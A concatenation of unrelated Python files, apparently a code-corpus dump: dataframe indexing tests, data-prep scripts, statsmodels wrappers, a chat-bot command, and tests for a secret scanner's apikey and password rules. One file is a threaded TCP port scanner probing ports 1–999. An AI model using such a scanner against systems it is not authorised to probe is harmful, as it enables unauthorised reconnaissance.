assert len(df2.chunks) == 2
for c in df2.chunks:
assert isinstance(c, SERIES_CHUNK_TYPE)
assert isinstance(c.index_value.to_pandas(), type(raw.columns))
assert c.name == 'a2'
assert c.dtype == raw.loc['a2'].dtype
# test slice
df2 = df.loc['a2': 'a3', 'y': 'z']
assert isinstance(df2, DataFrame)
assert df2.shape == (np.nan, 2)
pd.testing.assert_index_equal(df2.index_value.to_pandas(), df.index_value.to_pandas())
assert df2.index_value.key != df.index_value.key
pd.testing.assert_index_equal(df2.columns_value.to_pandas(), raw.loc[:, 'y': 'z'].columns)
pd.testing.assert_series_equal(df2.dtypes, raw.loc[:, 'y': 'z'].dtypes)
# test fancy index on index axis
df2 = df.loc[['a3', 'a2'], [True, False, True]]
assert isinstance(df2, DataFrame)
assert df2.shape == (2, 2)
pd.testing.assert_index_equal(df2.index_value.to_pandas(), df.index_value.to_pandas())
assert df2.index_value.key != df.index_value.key
pd.testing.assert_index_equal(df2.columns_value.to_pandas(),
raw.loc[:, [True, False, True]].columns)
pd.testing.assert_series_equal(df2.dtypes, raw.loc[:, [True, False, True]].dtypes)
# test fancy index which is md.Series on index axis
df2 = df.loc[md.Series(['a3', 'a2']), [True, False, True]]
assert isinstance(df2, DataFrame)
assert df2.shape == (2, 2)
pd.testing.assert_index_equal(df2.index_value.to_pandas(), df.index_value.to_pandas())
assert df2.index_value.key != df.index_value.key
pd.testing.assert_index_equal(df2.columns_value.to_pandas(),
raw.loc[:, [True, False, True]].columns)
pd.testing.assert_series_equal(df2.dtypes, raw.loc[:, [True, False, True]].dtypes)
# test fancy index on columns axis
df2 = df.loc[[True, False, True], ['z', 'x', 'y']]
assert isinstance(df2, DataFrame)
assert df2.shape == (2, 3)
pd.testing.assert_index_equal(df2.index_value.to_pandas(), df.index_value.to_pandas())
assert df2.index_value.key != df.index_value.key
pd.testing.assert_index_equal(df2.columns_value.to_pandas(),
raw.loc[:, ['z', 'x', 'y']].columns)
pd.testing.assert_series_equal(df2.dtypes, raw.loc[:, ['z', 'x', 'y']].dtypes)
df2 = tile(df2)
assert len(df2.chunks) == 2
for c in df2.chunks:
assert isinstance(c, DATAFRAME_CHUNK_TYPE)
pd.testing.assert_index_equal(c.index_value.to_pandas(), df.index_value.to_pandas())
assert c.index_value.key != df.index_value.key
pd.testing.assert_index_equal(c.columns_value.to_pandas(),
raw.loc[:, ['z', 'x', 'y']].columns)
pd.testing.assert_series_equal(c.dtypes, raw.loc[:, ['z', 'x', 'y']].dtypes)
df2 = df.loc[md.Series([True, False, True])]
assert isinstance(df2, DataFrame)
assert df2.shape == (np.nan, 3)
pd.testing.assert_index_equal(df2.index_value.to_pandas(), df.index_value.to_pandas())
assert df2.index_value.key != df.index_value.key
pd.testing.assert_index_equal(df2.columns_value.to_pandas(), raw.columns)
pd.testing.assert_series_equal(df2.dtypes, raw.dtypes)
df2 = df3.loc[md.Series([True, False, True])]
assert isinstance(df2, DataFrame)
assert df2.shape == (np.nan, 3)
assert isinstance(df2.index_value.to_pandas(), type(raw.loc[[True, False, True]].index))
assert df2.index_value.key != df3.index_value.key
pd.testing.assert_index_equal(df2.columns_value.to_pandas(), raw.columns)
pd.testing.assert_series_equal(df2.dtypes, raw.dtypes)
df2 = df3.loc[md.Series([2, 1])]
assert isinstance(df2, DataFrame)
assert df2.shape == (2, 3)
assert isinstance(df2.index_value.to_pandas(), type(raw2.loc[[2, 1]].index))
assert df2.index_value.key != df3.index_value.key
pd.testing.assert_index_equal(df2.columns_value.to_pandas(), raw.columns)
pd.testing.assert_series_equal(df2.dtypes, raw.dtypes)
series2 = series.loc['a2']
assert isinstance(series2, Tensor)
assert series2.shape == ()
assert series2.dtype == s.dtype
series2 = series.loc[['a2', 'a3']]
assert isinstance(series2, Series)
assert series2.shape == (2,)
assert series2.dtype == s.dtype
assert series2.name == s.name
with pytest.raises(IndexingError):
_ = df.loc['a1', 'z', ...]
with pytest.raises(NotImplementedError):
_ = df.loc[:, md.Series([True, False, True])]
with pytest.raises(KeyError):
_ = df.loc[:, ['non_exist']]
def test_loc_use_iloc():
raw = pd.DataFrame([[1, 3, 3], [4, 2, 6], [7, 8, 9]],
columns=['x', 'y', 'z'])
df = md.DataFrame(raw, chunk_size=2)
assert isinstance(df.loc[:3].op, DataFrameIlocGetItem)
assert isinstance(df.loc[1:3].op, DataFrameIlocGetItem)
assert isinstance(df.loc[1].op, DataFrameIlocGetItem)
# negative
assert isinstance(df.loc[:-3].op, DataFrameLocGetItem)
with pytest.raises(KeyError):
_ = df.loc[-3]
# index 1 not None
assert isinstance(df.loc[:3, :'y'].op, DataFrameLocGetItem)
# index 1 not slice
assert isinstance(df.loc[:3, [True, False, True]].op, DataFrameLocGetItem)
assert isinstance(df.loc[[True, False, True]].op, DataFrameLocGetItem)
raw2 = raw.copy()
raw2.index = pd.RangeIndex(1, 4)
df2 = md.DataFrame(raw2, chunk_size=2)
assert isinstance(df2.loc[:3].op, DataFrameLocGetItem)
assert isinstance(df2.loc['a3':].op, DataFrameLocGetItem)
raw2 = raw.copy()
raw2.index = [f'a{i}' for i in range(3)]
df2 = md.DataFrame(raw2, chunk_size=2)
assert isinstance(df2.loc[:3].op, DataFrameLocGetItem)
def test_dataframe_getitem():
data = pd.DataFrame(np.random.rand(10, 5), columns=['c1', 'c2', 'c3', 'c4', 'c5'])
df = md.DataFrame(data, chunk_size=2)
series = df['c3']
assert isinstance(series, Series)
assert series.shape == (10,)
assert series.name == 'c3'
assert series.dtype == data['c3'].dtype
assert series.index_value == df.index_value
series = tile(series)
assert isinstance(series, SERIES_TYPE)
assert all(not i.is_coarse() for i in series.inputs) is True
assert series.nsplits == ((2, 2, 2, 2, 2),)
assert len(series.chunks) == 5
for i, c in enumerate(series.chunks):
assert isinstance(c, SERIES_CHUNK_TYPE)
assert c.index == (i,)
assert c.shape == (2,)
df1 = df[['c1', 'c2', 'c3']]
assert isinstance(df1, DataFrame)
assert df1.shape == (10, 3)
assert df1.index_value == df.index_value
pd.testing.assert_index_equal(df1.columns_value.to_pandas(), data[['c1', 'c2', 'c3']].columns)
pd.testing.assert_series_equal(df1.dtypes, data[['c1', 'c2', 'c3']].dtypes)
df1 = tile(df1)
assert df1.nsplits == ((2, 2, 2, 2, 2), (2, 1))
assert len(df1.chunks) == 10
for i, c in enumerate(df1.chunks[slice(0, 10, 2)]):
assert isinstance(c, DATAFRAME_CHUNK_TYPE)
assert c.index == (i, 0)
assert c.shape == (2, 2)
for i, c in enumerate(df1.chunks[slice(1, 10, 2)]):
assert isinstance(c, DATAFRAME_CHUNK_TYPE)
assert c.index == (i, 1)
assert c.shape == (2, 1)
def test_dataframe_getitem_bool():
data = pd.DataFrame(np.random.rand(10, 5),
columns=['c1', 'c2', 'c3', 'c4', 'c5'],
index=pd.RangeIndex(10, name='i'))
df = md.DataFrame(data, chunk_size=2)
mask_data1 = data.c1 > 0.5
mask_data2 = data.c1 < 0.5
mask1 = md.Series(mask_data1, chunk_size=2)
mask2 = md.Series(mask_data2, chunk_size=2)
r1 = df[mask1]
r2 = df[mask2]
r3 = df[mask1]
assert r1.index_value.key != df.index_value.key
assert r1.index_value.key != mask1.index_value.key
assert r1.columns_value.key == df.columns_value.key
assert r1.columns_value is df.columns_value
assert r1.index_value.name == 'i'
assert r1.index_value.key != r2.index_value.key
assert r1.columns_value.key == r2.columns_value.key
assert r1.columns_value is r2.columns_value
assert r1.index_value.key == r3.index_value.key
assert r1.columns_value.key == r3.columns_value.key
assert r1.columns_value is r3.columns_value
def test_series_getitem():
data = pd.Series(np.random.rand(10, ), name='a')
series = md.Series(data, chunk_size=3)
result1 = series[2]
assert result1.shape == ()
result1 = tile(result1)
assert result1.nsplits == ()
assert len(result1.chunks) == 1
assert isinstance(result1.chunks[0], TENSOR_CHUNK_TYPE)
assert result1.chunks[0].shape == ()
assert result1.chunks[0].dtype == data.dtype
result2 = series[[4, 5, 1, 2, 3]]
assert result2.shape == (5,)
result2 = tile(result2)
assert result2.nsplits == ((2, 2, 1),)
assert len(result2.chunks) == 3
assert result2.chunks[0].op.labels == [4, 5]
assert result2.chunks[1].op.labels == [1, 2]
assert result2.chunks[2].op.labels == [3]
data = pd.Series(np.random.rand(10), index=['i' + str(i) for i in range(10)])
series = md.Series(data, chunk_size=3)
result1 = series['i2']
assert result1.shape == ()
result1 = tile(result1)
assert result1.nsplits == ()
assert result1.chunks[0].dtype == data.dtype
assert result1.chunks[0].op.labels == 'i2'
result2 = series[['i2', 'i4']]
assert result2.shape == (2,)
result2 = tile(result2)
assert result2.nsplits == ((2,),)
assert result2.chunks[0].dtype == data.dtype
assert result2.chunks[0].op.labels == ['i2', 'i4']
def test_setitem():
data = pd.DataFrame(np.random.rand(10, 2), columns=['c1', 'c2'])
df = md.DataFrame(data, chunk_size=4)
df['new'] = 1
assert df.shape == (10, 3)
pd.testing.assert_series_equal(df.inputs[0].dtypes, data.dtypes)
tiled = tile(df)
assert tiled.chunks[0].shape == (4, 3)
pd.testing.assert_series_equal(tiled.inputs[0].dtypes, data.dtypes)
assert tiled.chunks[1].shape == (4, 3)
pd.testing.assert_series_equal(tiled.inputs[0].dtypes, data.dtypes)
assert tiled.chunks[2].shape == (2, 3)
pd.testing.assert_series_equal(tiled.inputs[0].dtypes, data.dtypes)
for c in tiled.chunks:
pd.testing.assert_series_equal(c.inputs[0].dtypes, data.dtypes)
def test_reset_index():
data = pd.DataFrame([('bird', 389.0),
('bird', 24.0),
('mammal', 80.5),
('mammal', np.nan)],
index=['falcon', 'parrot', 'lion', 'monkey'],
columns=('class', 'max_speed'))
df = md.DataFrame(data, chunk_size=2).reset_index()
r = data.reset_index()
assert df.shape == (4, 3)
pd.testing.assert_series_equal(df.dtypes, r.dtypes)
pd.testing.assert_index_equal(df.columns_value.to_pandas(), r.columns)
df2 = tile(df)
assert len(df2.chunks) == 2
assert df2.chunks[0].shape == (2, 3)
pd.testing.assert_index_equal(df2.chunks[0].index_value.to_pandas(), pd.RangeIndex(2))
pd.testing.assert_series_equal(df2.chunks[0].dtypes, r.dtypes)
assert df2.chunks[1].shape == (2, 3)
pd.testing.assert_index_equal(df2.chunks[1].index_value.to_pandas(), pd.RangeIndex(2, 4))
pd.testing.assert_series_equal(df2.chunks[1].dtypes, r.dtypes)
df = md.DataFrame(data, chunk_size=1).reset_index(drop=True)
r = data.reset_index(drop=True)
assert df.shape == (4, 2)
pd.testing.assert_series_equal(df.dtypes, r.dtypes)
df2 = tile(df)
assert len(df2.chunks) == 8
for c in df2.chunks:
assert c.shape == (1, 1)
pd.testing.assert_index_equal(c.index_value.to_pandas(), pd.RangeIndex(c.index[0], c.index[0] + 1))
pd.testing.assert_series_equal(c.dtypes, r.dtypes[c.index[1]: c.index[1] + 1])
# test Series
series_data = pd.Series([1, 2, 3, 4], name='foo',
index=pd.Index(['a', 'b', 'c', 'd'], name='idx'))
s = md.Series(series_data, chunk_size=2).reset_index()
r = series_data.reset_index()
assert s.shape == (4, 2)
pd.testing.assert_series_equal(s.dtypes, r.dtypes)
s2 = tile(s)
assert len(s2.chunks) == 2
assert s2.chunks[0].shape == (2, 2)
pd.testing.assert_index_equal(s2.chunks[0].index_value.to_pandas(), pd.RangeIndex(2))
assert s2.chunks[1].shape == (2, 2)
pd.testing.assert_index_equal(s2.chunks[1].index_value.to_pandas(), pd.RangeIndex(2, 4))
with pytest.raises(TypeError):
md.Series(series_data, chunk_size=2).reset_index(inplace=True)
def test_head_tail_optimize():
raw = pd.DataFrame(np.random.rand(4, 3))
df = md.DataFrame(raw, chunk_size=2)
# no nan chunk shape
assert HeadTailOptimizedOperandMixin._need_tile_head_tail(tile(df).head(2).op) is False
df2 = tile(df[df[0] < 0.5])
# chunk shape on axis 1 greater than 1
assert HeadTailOptimizedOperandMixin._need_tile_head_tail(df2.head(2).op) is False
df = md.DataFrame(raw, chunk_size=(2, 3))
df2 = tile(df[df[0] < 0.5])
# not slice
assert HeadTailOptimizedOperandMixin._need_tile_head_tail(df2.iloc[2].op) is False
# step not None
assert HeadTailOptimizedOperandMixin._need_tile_head_tail(df2.iloc[:2:2].op) is False
# not head or tail
assert HeadTailOptimizedOperandMixin._need_tile_head_tail(df2.iloc[1:3].op) is False
# slice 1 is not slice(None)
assert HeadTailOptimizedOperandMixin._need_tile_head_tail(df2.iloc[:3, :2].op) is False
def test_reindex():
raw = pd.DataFrame(np.random.rand(4, 3))
df = md.DataFrame(raw, chunk_size=2)
with pytest.raises(TypeError):
df.reindex(unknown_arg=1)
with pytest.raises(ValueError):
df.reindex([1, 2], fill_value=mt.tensor([1, 2]))
|
import csv
from os import getcwd
import pandas as pd
sets=[('2007', 'train'), ('2007', 'val'), ('2007', 'test')]
classes = ["go","stop","warning"]
wd = getcwd()
wd = '/home/coldrain/data/'
sim = pd.read_csv(wd+'VOCdevkit/VOC2007/JPEGImages/annotation.csv')
def convert_annotation(year, image_id, list_file):
for i in range(len(sim['Filename'])):
# print(sim['Filename'][i].split('.')[0])
if(sim['Filename'][i].split('.')[0] == image_id):
cls = sim['label'][i]
cls_id = classes.index(cls)
b = (int(sim['Upper_left_corner_x'][i]), int(sim['Upper_left_corner_y'][i]), int(sim['Lower_right_corner_x'][i]), int(sim['Lower_right_corner_y'][i]))
list_file.write(" " + ",".join([str(a) for a in b]) + ',' + str(cls_id))
for year, image_set in sets:
image_ids = open(wd+'VOCdevkit/VOC%s/ImageSets/Main/%s.txt'%(year, image_set)).read().strip().split()
list_file = open(wd+'%s_%s.txt'%(year, image_set), 'w')
for image_id in image_ids:
list_file.write('%sVOCdevkit/VOC%s/JPEGImages/%s.jpg'%(wd, year, image_id))
convert_annotation(year, image_id, list_file)
list_file.write('\n')
list_file.close()
|
def histogram(s):
d = dict()
for c in s:
d[c] = d.get(c, s.count(c))
return d
h = histogram('brontosaurus')
print(h)
|
from functools import wraps
from statsmodels.tools.data import _is_using_pandas
from statsmodels.tsa.base import datetools
from statsmodels.tsa.tsatools import freq_to_period
def _get_pandas_wrapper(X, trim_head=None, trim_tail=None, names=None):
index = X.index
#TODO: allow use index labels
if trim_head is None and trim_tail is None:
index = index
elif trim_tail is None:
index = index[trim_head:]
elif trim_head is None:
index = index[:-trim_tail]
else:
index = index[trim_head:-trim_tail]
if hasattr(X, "columns"):
if names is None:
names = X.columns
return lambda x : X.__class__(x, index=index, columns=names)
else:
if names is None:
names = X.name
return lambda x : X.__class__(x, index=index, name=names)
def _maybe_get_pandas_wrapper(X, trim_head=None, trim_tail=None):
"""
If using pandas returns a function to wrap the results, e.g., wrapper(X)
trim is an integer for the symmetric truncation of the series in some
filters.
otherwise returns None
"""
if _is_using_pandas(X, None):
return _get_pandas_wrapper(X, trim_head, trim_tail)
else:
return
def _maybe_get_pandas_wrapper_freq(X, trim=None):
if _is_using_pandas(X, None):
index = X.index
func = _get_pandas_wrapper(X, trim)
freq = index.inferred_freq
return func, freq
else:
return lambda x : x, None
def pandas_wrapper(func, trim_head=None, trim_tail=None, names=None, *args,
**kwargs):
@wraps(func)
def new_func(X, *args, **kwargs):
# quick pass-through for do nothing case
if not _is_using_pandas(X, None):
return func(X, *args, **kwargs)
wrapper_func = _get_pandas_wrapper(X, trim_head, trim_tail,
names)
ret = func(X, *args, **kwargs)
ret = wrapper_func(ret)
return ret
return new_func
def pandas_wrapper_bunch(func, trim_head=None, trim_tail=None,
names=None, *args, **kwargs):
@wraps(func)
def new_func(X, *args, **kwargs):
# quick pass-through for do nothing case
if not _is_using_pandas(X, None):
return func(X, *args, **kwargs)
wrapper_func = _get_pandas_wrapper(X, trim_head, trim_tail,
names)
ret = func(X, *args, **kwargs)
ret = wrapper_func(ret)
return ret
return new_func
def pandas_wrapper_predict(func, trim_head=None, trim_tail=None,
columns=None, *args, **kwargs):
pass
def pandas_wrapper_freq(func, trim_head=None, trim_tail=None,
freq_kw='freq', columns=None, *args, **kwargs):
"""
Return a new function that catches the incoming X, checks if it's pandas,
calls the functions as is. Then wraps the results in the incoming index.
Deals with frequencies. Expects that the function returns a tuple,
a Bunch object, or a pandas-object.
"""
@wraps(func)
def new_func(X, *args, **kwargs):
# quick pass-through for do nothing case
if not _is_using_pandas(X, None):
return func(X, *args, **kwargs)
wrapper_func = _get_pandas_wrapper(X, trim_head, trim_tail,
columns)
index = X.index
freq = index.inferred_freq
kwargs.update({freq_kw : freq_to_period(freq)})
ret = func(X, *args, **kwargs)
ret = wrapper_func(ret)
return ret
return new_func
def dummy_func(X):
return X
def dummy_func_array(X):
return X.values
def dummy_func_pandas_columns(X):
return X.values
def dummy_func_pandas_series(X):
return X['A']
import pandas as pd
import numpy as np
def test_pandas_freq_decorator():
X = pd.util.testing.makeDataFrame()
# in X, get a function back that returns an X with the same columns
func = pandas_wrapper(dummy_func)
np.testing.assert_equal(func(X.values), X)
func = pandas_wrapper(dummy_func_array)
pd.util.testing.assert_frame_equal(func(X), X)
expected = X.rename(columns=dict(zip('ABCD', 'EFGH')))
func = pandas_wrapper(dummy_func_array, names=list('EFGH'))
pd.util.testing.assert_frame_equal(func(X), expected)
|
class Solution:
def XXX(self, str: str) -> int:
s=0
d={'0':0,'1':1,'2':2,'3':3,'4':4,'5':5,'6':6,'7':7,'8':8,'9':9}
flag=True
sign=1
for char in str:
if char==' ' and flag:
continue
elif char=='-' and flag:
sign=-1
flag=False
elif char=='+' and flag:
sign=1
flag=False
elif char not in d:
break
else:
s=10*s+d[char]
flag=False
ans=s*sign
if ans>0:
ans=min(ans,2147483647)
if ans<0:
ans=max(ans,-2147483648)
return ans
undefined
for (i = 0; i < document.getElementsByTagName("code").length; i++) { console.log(document.getElementsByTagName("code")[i].innerText); }
|
import sys
import socket
import threading
opened_ports = []
socket_instance = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
mutex = threading.Lock()
def is_valid_ipv4_address(address):
try:
socket.inet_pton(socket.AF_INET, address)
except AttributeError:
try:
socket.inet_aton(address)
except socket.error:
return False
return address.count('.') == 3
except socket.error:
return False
return True
def check_port(target, port):
mutex.acquire()
try:
if socket_instance.connect_ex((target, port)) == 0:
opened_ports.append(port)
finally:
mutex.release()
def main():
target = '' # provide a domain or an ipv4 address
if is_valid_ipv4_address(target) == False:
try:
target = socket.gethostbyname(target)
socket_instance.settimeout(2)
except socket.error as err:
print("socket creation failed with error %s" % (err))
sys.exit()
for port in range(1, 1000):
try:
threading.Thread(target=check_port, args=(target, port)).start()
except:
print("Error: unable to start thread")
print(opened_ports)
socket_instance.close()
if __name__ == '__main__':
main()
|
from commands.command import Command
from fbchat import Message
from fbchat import Mention
class countdown(Command):
def run(self):
if 'countdown' not in self.database:
self.database['countdown'] = "enabled"
mentions = [Mention(self.author_id, length=len(self.author.first_name) + 1)]
if len(self.user_params) == 0:
response_text = "@" + self.author.first_name + " Countdown is currently " + self.database['countdown']
elif self.user_params[0].lower() == "no":
self.database['countdown'] = "disabled"
response_text = "@" + self.author.first_name + " Countdown is now " + self.database['countdown']
elif self.user_params[0].lower() == "yes":
self.database['countdown'] = "enabled"
response_text = "@" + self.author.first_name + " Countdown is now " + self.database['countdown']
elif len(self.user_params) == 1 and self.database['countdown'] == "enabled":
try:
count = int(self.user_params[0])
if count > 10:
response_text = "I'm too lazy to do that..."
elif count <= 0:
response_text = "Lets do it again!"
else:
response_text = "!countdown " + str(count - 1)
mentions = None
except ValueError:
response_text = "You think you're soooo clever? Not anymore " + self.author.first_name + ", because I now have error catching!"
mentions = None
else:
response_text = "Sorry, !countdown is currently disabled. Please type !countdown YES and try again."
mentions = None
self.client.send(
Message(text=response_text, mentions=mentions),
thread_id=self.thread_id,
thread_type=self.thread_type
)
def define_documentation(self):
self.documentation = {
"parameters": "NUMBER / YES / NO",
"function": "Counts down recursively from NUMBER or enables/disables the countdown."
}
|
import tensorflow as tf
from absl.testing import parameterized
from model.architectures.losses import Momentum_Neighbors_NT_X, Momentum_NT_X, get_neighbors_mask_temporal, \
get_neighbors_dt_label_multiclass
class LossTest(parameterized.TestCase, tf.test.TestCase):
@parameterized.named_parameters(("base",))
def test_NCL_loss(self, ):
samples = tf.eye(100) # all samples are orthogonal one another
neigh_queue = tf.random.uniform((500, 2), 0, 1000.0)
queue = tf.concat([samples, tf.zeros((400, 100))], axis=0)
outputs_regular_CL = Momentum_NT_X([samples, queue], 0.05)
outputs_CL_as_NCL = Momentum_Neighbors_NT_X([samples, queue], neigh_queue, 0.05, 1.0,
get_neighbors_mask_temporal)
loss_CL = outputs_regular_CL[0]
loss_CL_as_NCL = outputs_CL_as_NCL[0]
self.assertAlmostEqual(loss_CL.numpy(), 0.0)
self.assertAlmostEqual(loss_CL_as_NCL.numpy(), 0.0)
self.assertEqual(loss_CL_as_NCL.numpy(), loss_CL.numpy())
@parameterized.named_parameters(('base', tf.stack([tf.range(100) + 1, -tf.range(100) - 1], axis=1),
tf.stack([-tf.range(400) - 1, tf.range(400) + 1], axis=1), 0))
def test_n_w(self, samples, queue, threshold):
neigh_mat_diag = get_neighbors_mask_temporal(samples, tf.concat([samples, queue], axis=0), threshold)
neigh_mat_double = get_neighbors_mask_temporal(samples, tf.concat([samples, samples], axis=0), threshold)
self.assertAllEqual(neigh_mat_diag[:100, :100], tf.eye(100))
self.assertAllEqual(tf.reduce_sum(neigh_mat_double, axis=1), 2 * tf.ones((100,)))
@parameterized.named_parameters(
('base', tf.random.uniform((100, 1), 1, 1000.0), - tf.random.uniform((400, 1), 1, 1000.0)))
def test_n_Y(self, samples, queue):
neigh_mat_diag = get_neighbors_dt_label_multiclass(samples, tf.concat([samples, queue], axis=0))
neigh_mat_double = get_neighbors_dt_label_multiclass(samples, tf.concat([samples, samples], axis=0))
self.assertAllEqual(neigh_mat_diag[:100, :100], tf.eye(100))
self.assertAllEqual(tf.reduce_sum(neigh_mat_double, axis=1), 2 * tf.ones((100,)))
if __name__ == '__main__':
tf.test.main()
|
## @package SimpleKL Provides some simple kinematic functions
import numpy as np
from Module import *
## Rotation matrix around x axis
# @param row Row
# @return Numpy matrix object of rotation matrix
def rotx(row):
return np.matrix([[1,0,0],[0,np.cos(row),-np.sin(row)],[0,np.sin(row),np.cos(row)]])
## Rotation matrix around y axis
# @param pitch Pitch
# @return Numpy matrix object of rotation matrix
def roty(pitch):
return np.matrix([[np.cos(pitch),0,np.sin(pitch)],[0,1,0],[-np.sin(pitch),0,np.cos(pitch)]])
## Rotation matrix around z axis
# @param yaw Yaw
# @return Numpy matrix object of rotation matrix
def rotz(yaw):
return np.matrix([[np.cos(yaw),-np.sin(yaw),0],[np.sin(yaw),np.cos(yaw),0],[0,0,1]])
## Checks whether two faces close enough
# @param pos1 Face norm vector of the first face
# @param pos2 Face norm vector of the second face
# @return If two faces are close, return True; otherwise, return False
def CloseEnough(pos1,pos2):
referenceVec = np.matrix([[pos1[0]-pos2[0]],[pos1[1]-pos2[1]],[pos1[2]-pos2[2]]])
dis = np.linalg.norm(referenceVec)
if dis>=0.098 and dis<=0.102:
return True
else:
return False
## Giving position of two modules to check which faces can be connected
# @param pos1 Position of the first module 1
# @param joint1 List of joint anlges of module 1
# @param pos1 Position of the first module 2
# @param joint1 List of joint anlges of a module 2
# @return If connectable, then return connectable node index number; otherwise False
def Connectable(module1,joint1,module2,joint2):
threshold = 0.98
referenceVec = np.matrix([[module1.Position[0]-module2.Position[0]],[module1.Position[1]-module2.Position[1]],[module1.Position[2]-module2.Position[2]]])
referenceVec = referenceVec/np.linalg.norm(referenceVec)
lftVec1 = np.matrix([[1],[0],[0]])
rgtVec1 = np.matrix([[-1],[0],[0]])
bckvec1 = np.matrix([[0],[1],[0]])
frtVec1 = np.matrix([[0],[-1],[0]])
bckvec1 = rotx(joint1[3])*bckvec1
lftVec1 = module1.rotation_matrix*lftVec1
rgtVec1 = module1.rotation_matrix*rgtVec1
bckvec1 = module1.rotation_matrix*bckvec1
frtVec1 = module1.rotation_matrix*frtVec1
connect1 = 4
if np.dot(referenceVec.transpose().tolist()[0],lftVec1.transpose().tolist()[0])<= -threshold:
connect1 = 1
if np.dot(referenceVec.transpose().tolist()[0],rgtVec1.transpose().tolist()[0])<= -threshold:
connect1 = 2
if np.dot(referenceVec.transpose().tolist()[0],bckvec1.transpose().tolist()[0])<= -threshold:
connect1 = 3
if np.dot(referenceVec.transpose().tolist()[0],frtVec1.transpose().tolist()[0])<= -threshold:
connect1 = 0
lftVec2 = np.matrix([[1],[0],[0]])
rgtVec2 = np.matrix([[-1],[0],[0]])
bckvec2 = np.matrix([[0],[1],[0]])
frtVec2 = np.matrix([[0],[-1],[0]])
bckvec2 = rotx(joint2[3])*bckvec2
lftVec2 = module2.rotation_matrix*lftVec2
rgtVec2 = module2.rotation_matrix*rgtVec2
bckvec2 = module2.rotation_matrix*bckvec2
frtVec2 = module2.rotation_matrix*frtVec2
connect2 = 4
if np.dot(referenceVec.transpose().tolist()[0],lftVec2.transpose().tolist()[0]) >= threshold:
connect2 = 1
if np.dot(referenceVec.transpose().tolist()[0],rgtVec2.transpose().tolist()[0]) >= threshold:
connect2 = 2
if np.dot(referenceVec.transpose().tolist()[0],bckvec2.transpose().tolist()[0]) >= threshold:
connect2 = 3
if np.dot(referenceVec.transpose().tolist()[0],frtVec2.transpose().tolist()[0]) >= threshold:
connect2 = 0
if connect1 != 4 and connect2 != 4:
return (connect1,connect2)
else:
return False |
from pathlib import Path
from re import compile
import pytest
from tests.unit.conftest import FIXTURE_PATH, does_not_raise, rule_path
from whispers.plugins import Yml
from whispers.rules import WhisperRules
from whispers.utils import load_yaml_from_file
@pytest.mark.parametrize(
("rulefile", "expectation"),
[
("empty.yml", does_not_raise()),
("valid.yml", does_not_raise()),
("multiple.yml", does_not_raise()),
("invalid_severity.yml", pytest.raises(ValueError)),
],
)
def test_load_rules(rulefile, expectation):
rules = WhisperRules(rulespath=rule_path("empty.yml"))
rulefile = rule_path(rulefile)
ruleyaml = load_yaml_from_file(Path(rulefile))
with expectation:
rules.load_rules(rulefile)
assert len(rules.rules) == len(ruleyaml)
for rule_id in ruleyaml.keys():
assert rule_id in rules.rules
@pytest.mark.parametrize(
("rulefile", "expectation"),
[("valid.yml", does_not_raise()), ("doesnotexist.yml", pytest.raises(FileNotFoundError))],
)
def test_load_rules_from_file(rulefile, expectation):
rules = WhisperRules()
rules_len = len(rules.rules)
with expectation:
rules.load_rules_from_file(Path(rule_path(rulefile)))
assert len(rules.rules) == rules_len + 1
@pytest.mark.parametrize(
("rulefile", "rules_added"),
[("empty.yml", 0), ("valid.yml", 1), ("multiple.yml", 4)],
)
def test_load_rules_from_dict(rulefile, rules_added):
rules = WhisperRules()
rules_len = len(rules.rules)
custom_rules = load_yaml_from_file(Path(rule_path(rulefile)))
rules.load_rules_from_dict(custom_rules)
assert len(rules.rules) == rules_len + rules_added
@pytest.mark.parametrize(("dups", "expectation"), [(1, does_not_raise()), (2, pytest.raises(IndexError))])
def test_load_rule(dups, expectation):
rules = WhisperRules()
rulefile = Path(rule_path("valid.yml"))
rule_id, rule = load_yaml_from_file(rulefile).popitem()
with expectation:
for _ in range(dups):
rules.load_rule(rule_id, rule)
assert rule_id in rules.rules
assert rules.rules[rule_id] == rule
@pytest.mark.parametrize(
("rulefile", "expectation"),
[("invalid_severity.yml", pytest.raises(ValueError)), ("multiple.yml", does_not_raise())],
)
def test_parse_rule(rulefile, expectation):
rules = WhisperRules()
rulefile = Path(rule_path(rulefile))
rule_id, rule = load_yaml_from_file(rulefile).popitem()
with expectation:
parsed_rule = rules.parse_rule(rule_id, rule)
for key in parsed_rule:
assert parsed_rule[key] == rule[key]
@pytest.mark.parametrize(("value", "expectation"), [("test", True), ("Test", False), ("1test", False)])
def test_match(value, expectation):
rules = WhisperRules(rulespath=rule_path("valid.yml"))
assert rules.match("valid", value) == expectation
@pytest.mark.parametrize(
("ruleslist", "expectation"),
[
("inexistent-rule-id", 0),
("apikey", 2),
("password", 3),
("apikey,password", 5),
],
)
def test_check(ruleslist, expectation):
filepath = FIXTURE_PATH.joinpath("ruleslist.yml")
rules = WhisperRules(ruleslist=ruleslist)
result = 0
for key, value, _ in Yml(rules).pairs(filepath):
result += len(list(rules.check(key, value, filepath, [])))
assert result == expectation
@pytest.mark.parametrize(
("rule", "value", "expectation"),
[
({"value": {"minlen": 1}}, "", False),
({"value": {"minlen": 1}}, "1", True),
({"key": {"minlen": 100}}, "whispers", True),
({"value": {"minlen": 4}}, "whispers", True),
({"value": {}}, "whispers", True),
({"value": {}}, b"binary", True),
({"value": {"minlen": -11}}, "", False),
({"value": {"minlen": None}}, "", False),
],
)
def test_check_minlen(rule, value, expectation):
rules = WhisperRules()
result = rules.check_minlen(rule, "value", value)
assert result == expectation
@pytest.mark.parametrize(
("rule", "value", "expectation"),
[
({"value": {"regex": compile(r"[a-z]+")}}, "whispers", True),
({"value": {"regex": compile(r"[A-Z]+")}}, "whispers", False),
({"key": {"regex": compile(r"[a-z]+")}}, "whispers", True),
({"value": {"regex": compile(r"[a-z]+")}}, b"binary", False),
({"value": {"regex": compile(r"[a-z]+")}}, 1, False),
({"value": {"regex": compile(r"[a-z]+")}}, None, False),
],
)
def test_check_regex(rule, value, expectation):
rules = WhisperRules()
result = rules.check_regex(rule, "value", value)
assert result == expectation
@pytest.mark.parametrize(
("rule", "key", "value", "expectation"),
[
({"similar": 0.3}, "A", "a", True),
({"similar": 0.3}, "B", "a", False),
({"similar": 0.3}, "a", "a" * 5, True),
({"similar": 0.3}, "a", "a" * 6, False),
({"similar": 0.3}, "API_TOKEN", "${API_TOKEN}", True),
({"similar": 0.3}, "API_TOKEN", "API_TOKEN_PLACEHOLDER", True),
],
)
def test_check_similar(rule, key, value, expectation):
rules = WhisperRules()
result = rules.check_similar(rule, key, value)
assert result == expectation
@pytest.mark.parametrize(
